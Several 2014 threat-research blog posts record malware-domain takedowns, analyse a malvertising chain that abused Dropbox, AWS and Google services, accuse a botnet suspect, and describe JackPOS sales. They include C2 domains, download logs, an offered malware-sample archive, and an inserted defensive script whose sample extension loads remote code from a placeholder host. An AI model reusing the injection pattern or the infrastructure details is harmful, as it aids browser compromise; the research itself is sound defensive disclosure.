Tuesday, February 25, 2014

Tango Down: The takedown of 209,306 .IN.NET Nuclear Pack DGA domains

This post is a tribute to the hard-working individuals and professionals who made the impossible happen.

The Report

As one result of a persistent collaboration between security researchers and the domain registration side, and following the previous suspension effort against Nuclear Pack Exploit Kit domains (link), on behalf of the individuals & professionals involved in the process we dare to announce the suspension of 209,306 Nuclear Pack domains on the TLD ".IN.NET". It is the biggest Tango Down score in the history of MalwareMustDie.

For security purposes we cannot say much in detail about this matter yet, except that all of the domains are positively "verdicted" for their involvement in the DGA scheme of the malicious infection toolkit, and were positively confirmed beforehand by suspicious facts found in a preliminary investigation of their registration. The bad actor(s) were preparing these domains to serve malware; the usage of these domains is now blocked, and the currently spotted active domains are all suspended.

We announce the tango news here to signal law enforcement and the authorities to start investigating the listed suspended domains, which contain data that can be used as cyber crime evidence of malware infection efforts through software exploitation by abusing .IN.NET internet domains en masse.

The full list of the DGA domains used and the checking report are so long that we cannot paste them all here in the post or in pastes (yet), but this is the link to the extracted DGA domains -->[here] < Thank you @jedisct1 and Gist!

Good Work Credit

Special thanks for the great cooperation from the DOMAINS.IN.NET Team, what speedy and solid work! It is a very long list but you checked it instantly, followed by the swift suspension.
Special credit goes to our friend Mr. Frank Denis of OpenDNS for the DGA decoding and its report, and to our Tango Department led by Mr. Sachin Raste of eScan, side by side with Mr. Conrad Longmore, Mr. Dhia Mahjoub of OpenDNS and other managers from varied entities whom we cannot all mention here, who are actually silently fighting this threat in a tough daily routine. Salud!

The process does not stop here. There will be more follow up.



Monday, February 24, 2014

How public services like Amazon AWS, DropBox, Google Project/Code & Google ShortURL got abused to infect malware

Today, I had almost gone to bed when I bumped into this threat. Please kindly bear with my sleepy eyes in writing this. I am combining the screenshots and logs/details in text; hopefully no filtration product will block this post for the bit of URLs pasted.

This writing contains many points that are important information for fellow friends and for the mentioned public services, so that they are aware of being abused by this malware infection session. So I wrote this as fast as possible, leaving the payload binary analysis and exploit analysis for a rain check. Any help in contacting the related abuse desks is very highly appreciated.

Infection Source:

First of all, the source of infection is the malware infection code/scripts implemented on the below IP and domain, located in the OVH network in France. I really hope to have help from friends in France to clean this IP of any malware infector toolkits installed:

Secondly, the infector starts from a Japanese IP under the domain: shortening .biz

This needs to be cleaned up too, yet I think more infectors exist..

The background

It started when checking a suspicious URL, accessed in the browser as per below:

I regenerated it with a separate scheme to record the below log (for the purpose of detailing the source of infection), just to make sure that we had everything in our hands:

--2014-02-24 02:40:02--  h00p://shortening .biz/qnwr
Resolving shortening.biz...
Caching shortening.biz =>
Connecting to shortening.biz||:80... connected.
GET /qnwr HTTP/1.1
Host: shortening.biz
HTTP request sent, awaiting response... 
HTTP/1.1 301 Moved Permanently
Date: Sun, 23 Feb 2014 17:40:03 GMT
Server: Apache/1.3.42 (Unix) mod_ssl/2.8.31 OpenSSL/0.9.8e
Location: http://shortening.biz/qnwr/
Keep-Alive: timeout=5, max=19
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1
301 Moved Permanently
Registered socket 4 for persistent reuse.
Location: http://shortening.biz/qnwr/ [following]
Skipping 302 bytes of body: [
301 Moved Permanently
Moved Permanently
The document has moved (A HREF="h00p://shortening .biz/qnwr/")here(/A)
Apache/1.3.42 Server at shortening.biz Port 80
] done.
--2014-02-24 02:40:03--  h00p://shortening .biz/qnwr/
GET /qnwr/ HTTP/1.1
Host: shortening.biz
HTTP/1.1 200 OK
Date: Sun, 23 Feb 2014 17:40:03 GMT
Server: Apache/1.3.42 (Unix) mod_ssl/2.8.31 OpenSSL/0.9.8e
Last-Modified: Thu, 23 Jan 2014 14:54:18 GMT
ETag: "1135-52e12d1a"
Accept-Ranges: bytes
Content-Length: 4405
Keep-Alive: timeout=5, max=19
Connection: Keep-Alive
Content-Type: text/html
200 OK
Length: 4405 (4.3K) [text/html]
Saving to: ‘sample.mmd’
100%[=======================================================>] 4,405       --.-K/s   in 0.009s  
2014-02-24 02:40:03 (459 KB/s) - ‘sample.mmd’ saved [4405/4405]

Back to the browser: after a short while the browser's address bar flickered to the redirection URL as per below:

And this act is confirmed by the series of HTML meta refresh tags grepped below:

What happened next? I was forwarded to a page with a video of "a lady in the bed" as captured below:

I was just about to praise how fortunate I am.. but the video soon stopped and a warning message came up, popping up the download of the Flash Player Setup.. as shown below:

The Path to Payload

Back to the shell, I simulated the download page for evidence:

And that actually gave me the below script:

And now we know why I got that redirection: dropboxusercontent.com (the very bottom link) is serving the infection landing page and I was redirected to it. I will explain this later on. There are also other conditions for another redirection, for mobile access and the Opera browser, via GOO.GL short URLs. Anyway, if we extract those short URLs for mobile and Opera browsers we'll get a better picture:

(I will have to leave it to other friends to check those two links deeper..)
Further research on the blacklisted URL found the below abused Amazon AWS account (sorted by history) used by the same threat:

And this is the malware file downloaded if you match the desired condition:

Now this payload is well detected by the AV industry, as shown in the VirusTotal result here-->>[link]
If you run the payload you will get the query and response in HTTP as follows:

And this payload downloads a "config" with info on the hash and URL of another malware, as shown here:

Here's that "guncel.exe" malware download session in my shell.. a simple wget will do.. This could be the update or something of the sort.

This is the VirusTotal report of "guncel.exe"; it is the same file as the original payload, which is also evidence that the origin of the payload is wjetphp.com (>>[link]). The detection rate as a VBA-based Trojan Downloader is not so bad after all, good work.

Below is an interesting trace of what this malware did in memory:

These are just some traces of the VBA calls used.. (during the creation of a registry key)

Quick analysis that might help fellow researchers and infected victims:

The payload will download the background.js JavaScript from a URL planted in the binary, as per the traffic below:

Which has the script as I pasted here-->>[link]
↑You can clearly see the malicious traffic redirection scheme and the access URL to the landing page (origin of the infection) in that script..

The next traffic explains how this background.js is called: the file manifest.json was downloaded, and it shows how background.js is executed by setting several security privileges for the execution of the script itself..

You can see the effort to fake "Google Shockwave Player" (is there any such product??) upon the execution of background.js above. Things are starting to make much more sense as to why so many Google-related "images" are used here.

PS: I will add some more reversing notes later on, but shall we move on a bit.. too little time.. for there are more important parts to cover..

What happens if we simulate the landing page access in the shell is something like this:

GET /s/pwuh8wdutwot4dg/rezillik.html HTTP/1.1
Host: dl.dropboxusercontent.com
HTTP/1.1 200 OK
accept-ranges: bytes
cache-control: max-age=0
Content-Type: text/html; charset=utf-8
Date: Sun, 23 Feb 2014 21:01:55 GMT
etag: 2n
pragma: public
Server: nginx
x-dropbox-request-id: ecd60af812734360278c876a87176a00
X-RequestId: 6f612d52e7e3c0e526aa4b355328e047
x-server-response-time: 202
Content-Length: 6841
Connection: keep-alive
---response end---
200 OK
Registered socket 4 for persistent reuse.
Length: 6841 (6.7K) [text/html]
Saving to: ‘sample4.mmd’

How did I get the payload downloaded then?? Let's see the code inside the page. Well.. it seems I got hit by the timer function stated in this code:

The Google short URL is again being used to hide the real malware payload URL, which is served from the Google Code SVN download!!

The download log can be seen in the follow-up section..

Well.. the bad guy behind this is really trying hard to convince the victim that a Google kind of application is being installed :-)
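
The redirect mechanisms described above (meta refresh, a browser-conditional redirect and a timer-driven one, each hopping through public services) can be pulled out of a saved page statically. This is an added example, not code from the original post or from the threat itself: the sample page, its URLs and the function names are constructed assumptions, and it merges the post's two pages into one sample.

```javascript
// Added example: list the redirects a saved landing page would trigger,
// without rendering it. Conditions around a redirect are not evaluated.

// Services the post names as abused; used only to label each hop.
const SERVICE_LABELS = {
  "goo.gl": "URL shortener",
  "dropboxusercontent.com": "file hosting",
  "amazonaws.com": "cloud storage",
  "googlecode.com": "project hosting",
};

function labelFor(hostname) {
  for (const domain of Object.keys(SERVICE_LABELS)) {
    if (hostname === domain || hostname.endsWith("." + domain)) {
      return SERVICE_LABELS[domain];
    }
  }
  return "other";
}

function extractRedirects(html, baseUrl) {
  const hops = [];
  const add = (kind, delayMs, raw) => {
    let u;
    try { u = new URL(raw.trim(), baseUrl); } catch { return; } // skip junk
    hops.push({ kind, delayMs, url: u.href, service: labelFor(u.hostname) });
  };

  // 1. <meta http-equiv="refresh" content="SECONDS; url=TARGET">
  for (const tag of html.match(/<meta\b[^>]*>/gi) || []) {
    if (!/http-equiv\s*=\s*["']?refresh/i.test(tag)) continue;
    const content = /content\s*=\s*(["'])(.*?)\1/i.exec(tag);
    const m = content &&
      /^\s*(\d+(?:\.\d+)?)\s*[;,]\s*(?:url\s*=)?\s*(.+)$/i.exec(content[2]);
    if (m) add("meta-refresh", Number(m[1]) * 1000, m[2].replace(/^['"]|['"]$/g, ""));
  }

  // 2. Remember where setTimeout(...) calls sit and what delay they use.
  const timers = [];
  const timerRe = /setTimeout\s*\(([\s\S]*?),\s*(\d+)\s*\)/g;
  for (let t; (t = timerRe.exec(html)) !== null; ) {
    timers.push({ start: t.index, end: timerRe.lastIndex, delay: Number(t[2]) });
  }

  // 3. location = "...", location.href = "...", location.replace("...")
  const locRe = /\blocation(?:\.href)?\s*=\s*(["'])(.*?)\1|\blocation\.(?:replace|assign)\s*\(\s*(["'])(.*?)\3/g;
  for (let l; (l = locRe.exec(html)) !== null; ) {
    const timer = timers.find((t) => l.index >= t.start && l.index < t.end);
    const target = l[2] !== undefined ? l[2] : l[4];
    add(timer ? "js-timer" : "js-location", timer ? timer.delay : 0, target);
  }
  return hops;
}

// Constructed sample page and base URL (not the page from the incident).
const SAMPLE_BASE = "http://landing.example.invalid/";
const SAMPLE_PAGE = `
<html><head>
<meta http-equiv="refresh" content="3; url=https://dl.dropboxusercontent.com/s/CONSTRUCTED/landing.html">
<script>
if (/Opera|Mobile/.test(navigator.userAgent)) {
  window.location = "http://goo.gl/CONSTRUCTED1";
}
setTimeout(function () { location.href = "http://goo.gl/CONSTRUCTED2"; }, 5000);
</script>
</head><body></body></html>`;

for (const hop of extractRedirects(SAMPLE_PAGE, SAMPLE_BASE)) {
  console.log(`${hop.kind} after ${hop.delayMs} ms -> ${hop.url} [${hop.service}]`);
}
```

Each short-URL hop still has to be resolved separately to learn the final payload location.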

Some reversing & investigation notes

I used a recent sample from an abused Google Code SVN here:

The sample is in VT here-->[link]

Straight to the point: A reversing effort showing the CNC masked in binary strings:

The User Name :-))

Maybe we'll need these later, just in case, noted:

"key": "MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCtl3tO0osjuzRsf6xtD2SKxPlTfuoy7AWoObysitBPvH5fE1NaAA1/2JkPWkVDhdLBWLaIBPYeXbzlHp3y4Vv/4XG+aN5qFE3z+1RU/NqkzVYHtIpVScf3DjTYtKVL66mzVGijSoAIwbFCC3LpGdaoe6Q1rSRD

Next, following the trail of that CnC URL to find the junk used:

Now we can see the code clearly, instead of the PCAP data :-D
Look at the dates well: the crook was recently modifying the malicious background.js script.
It has the background.js and manifest.json code snipped below:

As explained way up above, the JSON is used for the execution of background.js. We didn't have a chance to disclose background.js clearly before, so this is it, a fresh one. First, the beautified full code of background.js is:

If you see what I see, the attacker is aiming at the Google Chrome browser, by abusing its API (chrome.tabs) to interact with the browser's tab system. This API can be used to create, modify, and rearrange tabs in the browser. Anyway, what he did is, on the "devtools://" index/tab, he programmed it to execute a remote script via the chrome.tabs.executeScript command, pointing to www.saatlikrapor .com/ext/s.php, which was BAD (gone now-->link and link) in . Either this crook loves Google so much or hates Google that much.. since now we know he is aiming at Google Chrome browser end users too.
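
One way to triage an extension like this statically, as an added example (not code from the original post and not the actor's files): it checks manifest.json for the privileges that make the injection possible and pulls remote URLs out of chrome.tabs.executeScript calls in the background script. The manifest, the script, the example.invalid URL and all function and rule names are constructed assumptions of this example.

```javascript
// Added example: static triage of an unpacked Chrome extension (manifest v2).
// Every sample value below is constructed; example.invalid is a placeholder host.

const BROAD_HOSTS = new Set(["<all_urls>", "*://*/*", "http://*/*", "https://*/*"]);
const BRAND_WORDS = ["google", "flash", "shockwave", "adobe", "chrome"];
const URL_RE = /https?:\/\/[^\s'"\\)]+/g;

// Return the text of a call's argument list, starting at its opening "(".
// String literals are skipped so parentheses inside injected code do not
// end the match early.
function sliceCall(src, openIdx) {
  let depth = 0;
  let quote = null;
  for (let i = openIdx; i < src.length; i++) {
    const c = src[i];
    if (quote) {
      if (c === "\\") i++;                 // skip the escaped character
      else if (c === quote) quote = null;
    } else if (c === '"' || c === "'" || c === "`") {
      quote = c;
    } else if (c === "(") {
      depth++;
    } else if (c === ")" && --depth === 0) {
      return src.slice(openIdx, i + 1);
    }
  }
  return src.slice(openIdx);               // unbalanced input: keep the rest
}

// manifestText: contents of manifest.json; scripts: { fileName: sourceText }.
function triageExtension(manifestText, scripts) {
  const findings = [];
  const manifest = JSON.parse(manifestText);
  const perms = manifest.permissions || [];

  if (perms.includes("tabs")) {
    findings.push({ rule: "perm-tabs", detail: "can read URL and title of every tab" });
  }
  const broad = perms.filter((p) => BROAD_HOSTS.has(p));
  if (broad.length > 0) {
    // Host patterns this wide allow script injection into any page.
    findings.push({ rule: "perm-all-hosts", detail: broad.join(", ") });
  }
  const name = String(manifest.name || "").toLowerCase();
  const brands = BRAND_WORDS.filter((w) => name.includes(w));
  if (brands.length > 0) {
    // Heuristic only: a vendor name in the title proves nothing by itself.
    findings.push({ rule: "brand-in-name", detail: brands.join(", ") });
  }

  const background = (manifest.background && manifest.background.scripts) || [];
  for (const file of background) {
    const src = scripts[file];
    if (typeof src !== "string") {
      findings.push({ rule: "missing-script", detail: file });
      continue;
    }
    const callRe = /chrome\.tabs\.executeScript\s*\(/g;
    for (let m; (m = callRe.exec(src)) !== null; ) {
      const call = sliceCall(src, callRe.lastIndex - 1);
      findings.push({ rule: "execute-script", detail: file });
      for (const url of call.match(URL_RE) || []) {
        // A URL inside the injected code means behaviour is controlled remotely.
        findings.push({ rule: "remote-code-url", detail: url });
      }
    }
  }
  return findings;
}

// Constructed sample extension (not the files from the incident).
const SAMPLE_MANIFEST = JSON.stringify({
  manifest_version: 2,
  name: "Constructed Shockwave Player",
  version: "1.0",
  background: { scripts: ["background.js"] },
  permissions: ["tabs", "http://*/*", "https://*/*"],
});
const SAMPLE_BACKGROUND = `
chrome.tabs.onUpdated.addListener(function (tabId, info) {
  if (info.status === "complete") {
    chrome.tabs.executeScript(tabId, {
      code: "var s=document.createElement('script');" +
            "s.src='http://example.invalid/ext/s.php';" +
            "document.head.appendChild(s);"
    });
  }
});
`;

for (const f of triageExtension(SAMPLE_MANIFEST, { "background.js": SAMPLE_BACKGROUND })) {
  console.log(f.rule + ": " + f.detail);
}
```

A "remote-code-url" finding together with "perm-all-hosts" is the combination worth escalating; the other rules are context.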

PS: The saatlikrapor.com domain is hidden behind Cloudflare:

;www.saatlikrapor.com.          IN      A

www.saatlikrapor.com.   300     IN      CNAME   saatlikrapor.com.
saatlikrapor.com.       300     IN      A
saatlikrapor.com.       300     IN      A

saatlikrapor.com.       3600    IN      NS      "jeff.ns.cloudflare.com."
saatlikrapor.com.       3600    IN      NS      "lisa.ns.cloudflare.com."

jeff.ns.cloudflare.com. 384     IN      A
lisa.ns.cloudflare.com. 371     IN      A

This is the domain information, a shiny brand new one:
   Registrar: DOMAINSITE, INC.
   Whois Server: whois.domainsite.com
   Referral URL: http://www.domainsite.com
   Status: clientTransferProhibited
   Updated Date: 25-feb-2014
   Creation Date: 25-feb-2014
   Expiration Date: 25-feb-2015

Registrar: DomainSite, Inc.
Registrar IANA ID: 466
Registrar Abuse Contact Email: abuse@domainsite.com
Registrar Abuse Contact Phone: +1.17202492374
Domain Status: addPeriod
Domain Status: clientTransferProhibited
Registrant Name: Whois Agent
Registrant Organization: Whois Privacy Protection Service, Inc.

And how about the CnC used? akillitelefonburada.com ; SAME pattern! :-) behind Cloudflare..
;akillitelefonburada.com.       IN      A

akillitelefonburada.com. 300    IN      A
akillitelefonburada.com. 300    IN      A

akillitelefonburada.com. 3600   IN      NS      "jeff.ns.cloudflare.com."
akillitelefonburada.com. 3600   IN      NS      "lisa.ns.cloudflare.com."

jeff.ns.cloudflare.com. 3462    IN      A
lisa.ns.cloudflare.com. 3483    IN      A

And under the below registration details:
   Whois Server: whois.nicproxy.com
   Referral URL: http://www.nicproxy.com
   Status: ok
   Updated Date: 12-jan-2014
   Creation Date: 07-jun-2013
   Expiration Date: 07-jun-2014

We will have to deal with Turkish law enforcement to nail this guy for good:
CREATE DATE: 6/7/2013 11:59:57 AM
UPDATED DATE: 1/12/2014 3:25:26 PM
EXPIRATION DATE: 6/7/2014 11:59:57 AM

owner-organization:Whois Privacy Protection Service.

No, no, it is NOT a hacking site: (Pls don't give me that preach..)
$ curl akillitelefonburada.com
$ curl saatlikrapor.com
$ date
Fri Feb 28 10:10:36 JST 2014


The domain WJETPHP.COM, which was mentioned in the top section as the "payload center" (read: CNC), is also still alive now with the below details:

$ dig WJETPHP.COM any

; <<>> DiG 9.8.5-P1 <<>> WJETPHP.COM any
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 542
;; flags: qr rd ra; QUERY: 1, ANSWER: 4, AUTHORITY: 0, ADDITIONAL: 0


WJETPHP.COM.  21599 IN NS "mary.ns.cloudflare.COM."
WJETPHP.COM.  21599 IN NS "todd.ns.cloudflare.COM."
WJETPHP.COM.  21599 IN SOA mary.ns.cloudflare.COM. dns.cloudflare.COM. 2014501676 10000 2400 604800 3600

;; Query time: 277 msec
;; WHEN: Sun Mar 09 04:12:37 JST 2014
;; MSG SIZE  rcvd: 137

As you see, he is still hiding his service behind Cloudflare until now (read: Cloudflare's customer).

Moreover, the ownership of the domain:

Domain Name: WJETPHP.COM
Registrar: FBS INC.
Whois Server: whois.isimtescil.net
Referral URL: http://www.isimtescil.net
Status: clientTransferProhibited
Updated Date: 01-feb-2014
Creation Date: 24-may-2013
Expiration Date: 24-may-2014
>>> Last update of whois database: Sat, 08 Mar 2014 19:17:39 UTC <<<

Domain Name: WJETPHP.COM
Registry Domain ID:
Registrar WHOIS Server: whois.isimtescil.net
Registrar URL: http://www.isimtescil.net
Updated Date: 24-Jul-2013
Creation Date: 24-May-2013
Registrar Registration Expiration Date: 24-May-2014
Registrar: FBS Inc.
Registrar IANA ID: 1110
Registrar Abuse Contact Email: abuse@domaintime.biz
Registrar Abuse Contact Phone: +902163299393
Domain Status: clientTransferProhibited

URL of the ICANN WHOIS Data Problem Reporting System:
>>>Last update of WHOIS database: 2014-03-08T19:18:12+0000Z<<<
Registration Service Provided By: WWW.ISIMTESCIL.NET


How to conclude this matter generally? Obviously, well-known public internet services were targeted to spread this infection. Let me describe how many of those abused services were spotted in this single case:
Number one, amazonaws.com (property of Amazon AWS) is utilised by this actor for some other bad-purpose scheme (see the mobile link and Opera browser link in the above explanation; whatever it is, it is not a good thing), so we'd better warn Amazon AWS about this link.
Number two, dropboxusercontent.com (property of Dropbox, Inc) is also utilised to serve payload malware.
Is that all? No. Number three: see the domain in the payload URL, googlecode.com; it is the abuse of Google Code's SVN facility.
More? Yes, the last one, number four: the goo.gl service, the Google ShortURL, is also abused to hide the URL of the malware payload.

Google Code has been abused to serve malware payloads of this threat's series for quite a while; you can view the reports posted by our friend @sarimura (twitter) to the Project Hosting on Google Code in Google Groups-->[here]. It shows how persistent the malware actor is in always creating a new Google project and using its download URL to serve the malware payloads. On the other hand, it shows that the bad actor(s) leave many traces in the Google Code servers while uploading the payloads (account ID, IP addresses, etc).. a hint to follow, isn't it?


I share all samples, under the usual password; click the picture below to download:

Moral of the story: Our beloved internet and its services are badly abused by malware. Stay safe please!
PS: Comments and additions are to be added in the follow-up section! And it looks like this threat is bigger than expected, so I couldn't sleep again; gotta go to my day work now!

Updates: How bad the abuse & this malvertisement is?

The bad actor keeps on changing users in Amazon AWS and Google Code to serve the next malicious payload. The new abused Amazon AWS page is:
unluvideolari.s3.amazonaws .com/unlu.html URLQuery-->[link]

PoC of how bad the malware download is:

Another PoC:

The recent Google Code SVN that's being abused:

Google set a good work-around by 401 authentication:

Or the 403:

Now Emerging Threats is releasing a signature that can be used to identify this malware download:

Update Info Credit: @sarimura (twitter), signature: Emerging Threats & @node5 (twitter), test & checks: @urlquery (twitter), thanks to Google for continuing to nuke the bad accounts and for the nice stats of the short URL.

Follow Up

Great follow, thanks for always being fast in responses!


Tuesday, February 18, 2014

Long Talk "AV Tokyo 2013.5" - #Kelihos #CookieBomb #RedKit : Bad Actor's Arrest Request Filed Officially

On Sunday, February 16th 2014, in a presentation at AV Tokyo 2013.5, a prestigious security event in Japan (link), we (read: MalwareMustDie, an NPO of Anti Cyber Crime International Research Group) announced the connection between several cyber crime actions (malicious abuse of computer exploitation and credentials with the usage of malware): CookieBomb (IFRAME from the "North") infection (link), Kelihos Botnet infection (link), spam that leads to malware infection / malvertisement (link), and the usage of malicious exploitation tools such as RedKit/Goon/Infinity for malware infection (link), which are causing a series of accusations of abuse against the Japan National Cyber Space & Networking Jurisdiction under the following security violation verdicts:
(1) Remote hack on personal computers of national individual/entities
(2) Stealing of credential and privacy property of national individual/entities
(3) 30,000+ malicious code injection by web hacking to national service infrastructure 
(4) Abuse utilization of national computers to distribute malware worldwide.

The presentation video (censored):

The crime, which has been in progress for a significantly long time with an increasing trend in damage and quantity under the verdicts stated above, was proven by submitting all of the investigation facts and evidence that lead to one Russia Federation citizen as the individual crime suspect (link). The details of the actor's identification were announced "beyond any doubt" in front of the Japan national IT security community, followed by officially filing all investigation material under the category of National Cyber Crime Abuse and Act of Terrorism against National Network, reported to the National Police Agency, Japan - Cyber Force Center, High-Tech Crime Technology Division - Cyber Terror Incident Handling Unit (link), with notification to the Information-technology Promotion Agency - Japan (link), JP-CERT/CC (link), Interpol Digital Crime Investigation Support, Europol EC3 (link), the Anti-Phishing Working Group (link) and several related European law enforcement agencies, and witnessed by important top-notch national security researchers.

The facts collected over the investigation time frame, and the unbearable rise in casualties and damage of the crime in progress on the Japan national computer infrastructure, were clearly presented to the national security community attendants at the event, and it was urged to raise the serious national security issue against the malicious acts of a Russia Federation individual citizen (link) who is still performing his daily crime activity in abusing the Japan national network.

We hope to raise an official request for cooperation from Japan law enforcement to Russia Federation law enforcement to take firm action to stop this crime and terror effort for good. Further delay in legal action in the Russia Federation against the positively confirmed individual suspect will only prolong the unnecessary damage to victims on Japanese soil, not to mention to other countries that have been victimized like Taiwan, India, Ukraine, Georgia, Poland and the Russia Federation's own victims as the top hit of the threat, or to other countries in Europe that have been abused and used as control center servers of this malware activity.

To be noted, Kelihos Botnet infection itself was also spotted infiltrating United States personal computer dial-up infrastructure, and the investigation information on the threat, with its activity's relation to a notorious spammer (link) and the similarity in identification, was also reported accordingly to the Federal Bureau of Investigation in the United States, in the hope that the FBI will consider re-opening the legal case against Petr Severa (link) and (link). To all countries victimized by the same threat, we urge you to follow the same procedure we are conducting here in Japan, by filing an official crime report to be followed and escalated properly by your law enforcement to Russia Federation law enforcement.

MalwareMustDie, NPO and its partners in investigation have been in this operation since August 2013. The real identification of the bad actor was revealed in September 2013 with the collaboration of our crime investigation partner in the Russia Federation, GroupIB (link), who informed us about filing the case with Russia Federation law enforcement in October 2013. We revealed the weakness of the botnet at BotConf 2013, December 5th, 2013 in Nantes, France. As proof of concept in stopping the malware payload and positively identifying the CNC owner, we did the "takedown" of most of the Kelihos botnet CNC between December 1-3, 2013.

#MalwareMustDie, NPO

Thursday, February 13, 2014

Tango Down of Nuclear Pack's 174 Multiple Registered .PW Domains

To "some" fellow researchers: Don't mock us for taking down these bad domains. Think of the victims who get infected on an hourly basis! Sorry if we blew your "tracking" objects away. Because of this takedown, the data behind these domains is now ready for law enforcement to collect.

The background

Following the case on Nuclear Exploit Kit on malware infection via abuse of .PW 2LD domains (initially spotted : to - As the follow up due to the below malicious verdict of the researcher team & friends:

Dynamoo: http://blog.dynamoo.com/2014/02/something-evil-on-3141221131-to.html
Dynamoo: http://blog.dynamoo.com/2014/02/something-evil-on-19295722428.html
Dynamoo: http://blog.dynamoo.com/2014/01/something-evil-on-192951020828.html
Malekal: https://twitter.com/malekal_morte/status/432804655374938112
Umbrella Labs: http://labs.umbrella.com/2014/02/14/when-ips-go-nuclear/
Dhia Mahjoub: http://pastebin.com/QVq2xERk 

To be noted: We are not going to expose any technical evidence for this case in this post; this post focuses on the Tango Down effort initiated by MalwareMustDie, NPO. The details of the Nuclear Pack itself are well documented for MMD friends in our public forum as an information database of exploitation. (You have to be invited to be a member.)

Spotting and following the movement of this threat from:
31 December 2013 until 13 February 2014.
And witnessing the movement of the threat of the same group/actors:
From OVH.COM (France) to: BESTHOSTING.UA (Kiev, Ukraine) at: AS 2655 ref-->> http://bgp.he.net/AS42655
Additional: BESTHOSTING.UA ref-->> https://www.besthosting.ua/en/

Additional information of the threat (to be added) - Thank you URLQuery!

One of the recorded .PW of this verdict in action :
And the current LIVE activity recorded:

The Action and Advisory

We requested the suspension of a total of 174 domains with the breakdown stated below, and the suspension was done successfully.

These bad domains share the same bad actor's route.
The registration information of the domains listed below is traceable to potential positive evidence for the ID of the actors, which can be used in a law enforcement investigation following this cyber crime case; LE will need to request it directly via ICANN from the registration entity accordingly.

Any malicious system exploitation and malware infection traffic recorded, and logs related to the verdicted domains and their IP addresses, can be used as evidence of the cyber crime activities; please pass them to your nearest CERT for further processing. The IPs recorded in each log could still be in operation and are good material for further monitoring and mitigation of the threat, and this post can be used officially as a reference. Please take note of this advisory.

Tango Down

1. Under NAMECHEAP.COM (LA, USA) Registrar (Count: 13) - Status:serverHold:
STATUS: Status:serverHold

$ date && bash check_nonru.sh
Thu Feb 13 20:57:51 JST 2014

ipchk-shell 1.3 FreeBSD version - by @unixfreaxjp
ewrqb,pw,,DNS1.REGISTRAR-SERVERS.COM Status:serverHold
fdsgr,pw,,DNS1.REGISTRAR-SERVERS.COM Status:serverHold
hrebuf,pw,,DNS1.REGISTRAR-SERVERS.COM Status:serverHold
hrebuff,pw,,DNS1.REGISTRAR-SERVERS.COM Status:serverHold
hrebufffff,pw,,DNS1.REGISTRAR-SERVERS.COM Status:serverHold
hrebuqq,pw,,DNS1.REGISTRAR-SERVERS.COM Status:serverHold
hsfgv,pw,,DNS1.REGISTRAR-SERVERS.COM Status:serverHold
hsfgvvvv,pw,,DNS1.REGISTRAR-SERVERS.COM Status:serverHold
hsfgww,pw,,DNS1.REGISTRAR-SERVERS.COM Status:serverHold
jvdsdveeee,pw,,DNS1.REGISTRAR-SERVERS.COM Status:serverHold
rrthg,pw,,DNS1.REGISTRAR-SERVERS.COM Status:serverHold
rrthh,pw,,DNS1.REGISTRAR-SERVERS.COM Status:serverHold
rrthk,pw,,DNS1.REGISTRAR-SERVERS.COM Status:serverHold


2. Under etc Registrar (Count: 73) - Status: Suspension Flag:

$ date && bash check_nonru.sh
Thu Feb 13 20:58:542 JST 2014

ipchk-shell 1.3 FreeBSD version - by @unixfreaxjp

3. Under etc registrar (Count: 88) - Status:serverHold:

$ date && bash check_nonru.sh
Thu Feb 13 20:59:55 JST 2014

ipchk-shell 1.3 FreeBSD version - by @unixfreaxjp


Thank you: @essachin @ConradLongmore @DhiaLite @abhinavbom @malekal_morte (twitter)


MMD-0016-2014 - The JackPOS Behind the Screen

The background

As credit for the current awareness of the threat, a lot of you have probably noticed the JackPOS malware posted in Xylit0l's post on Kernel Mode here -->>[kernelmode], in the IntelCrawler press release here -->>[IntelCrawler], and in Josh Grunzweig's analysis on Trustwave SpiderLabs here -->>[LINK]

This post is additional intelligence data supporting the threat's technicalities written up in the main investigation of the threat by the above-mentioned gentlemen. It is our share, which may help law enforcement to aim a better cannon directly at the bad actors (read: Moronz) who are actively making an effort to sell and promote the threat, the ones behind the distribution of the JackPOS malware scene.

As always mentioned in previous posts, we (read: MMD / MalwareMustDie, NPO - Anti CyberCrime & Malware Research Group) work not only in a defensive / mitigating way against the threat, but are proactive in spotting the root of a threat at as early a stage as possible, thus inviting and supporting law enforcement & CERT folks to initiate a crime case upon it.

DarkK0de (DK) Crook's Forum

This information was all compiled from what we saw with our own eyes in the DK forum. Posted there were the promotion, the testing information, the latest specification of JackPOS (from here on I will refer to it as "the product"), the screenshots and the contact information of the bad actor (read: moronz) behind it. I am sorry, after "internal discussion" it was decided not to paste the DK forum screenshots themselves, since that would raise the risk of blowing our intelligence channel.

What we post here, in the following sections, may add more images & information on the "product" design of JackPOS to what IntelCrawler, Xylit0l & Josh worked hard to analyze. Please note and understand: we are not adding more technical details, but campaign and product design data, and we are not aiming for fame or riding the flux of news on this threat. It's just that so far we have not seen the on-going investigation aim at the right clues to the threat's source, so this share is meant to lead law enforcement friends closer to the target, the right "crook's forum" as the source of this malware campaign: "The DarkK0de".

And for you, all the malware crooks that I know are reading this post too, we want to let you know: MMD is different, WE BREATHE BEHIND YOUR NECK! And we mean it, no matter how tight the "poor security" environment of your so-called gathering place (a.k.a. "forums"? ..whatever..) is. Just STOP your malicious activity NOW, before it gets too late! Go and get a decent day job like all of us and live a decent life without fear. Consider this a warning.

OK, the main course:


The screenshots posted on DK, as they are:

Admin panel:

Dumps of CreditCard panel

The Bots Control Panel

Promotion Thread

Malware: (functions & specs)

- Coded in modern c++
- Size 145 kbytes (upx packed)
- Small resource usage, ~90% of time 4 mbytes RAM and 0-2% cpu usage
- Doesn't use regular expressions
- Grabs track1/track2
- Update / Execute virus
- Process persistence, if process closed, automatically will start again
- Registry persistence, if registry key deleted or changed, it's restored
- Very stable and well tested
- Same track1/track2 won't be sent second time to panel (saved hashes of
  dumps in a file)
- Once it finds processes with valid data, the virus scrapes just them in
  a loop of 100 times, then rescans all the processes till it finds
  productive ones. (Done in one thread for stability)

Product Updates:

The new version of the virus has some new features that the old one doesn't:

- Support of Unicode dumps in processes
- Much more stable
- Improved panel (issues with archiving of dumps and bots),
  also changed exporting
- Once it finds processes with valid data, the virus scrapes just them
  in a loop of 100 times, then rescans all the processes till it finds
  productive ones. (Done in one thread for stability)

The Price:

1 bin = 1,5K BTC

The seller / tester contact information

As posted:

Seller jabber: mindark@jabbim.com
Tester jabber: Rome0@Darkode.com 
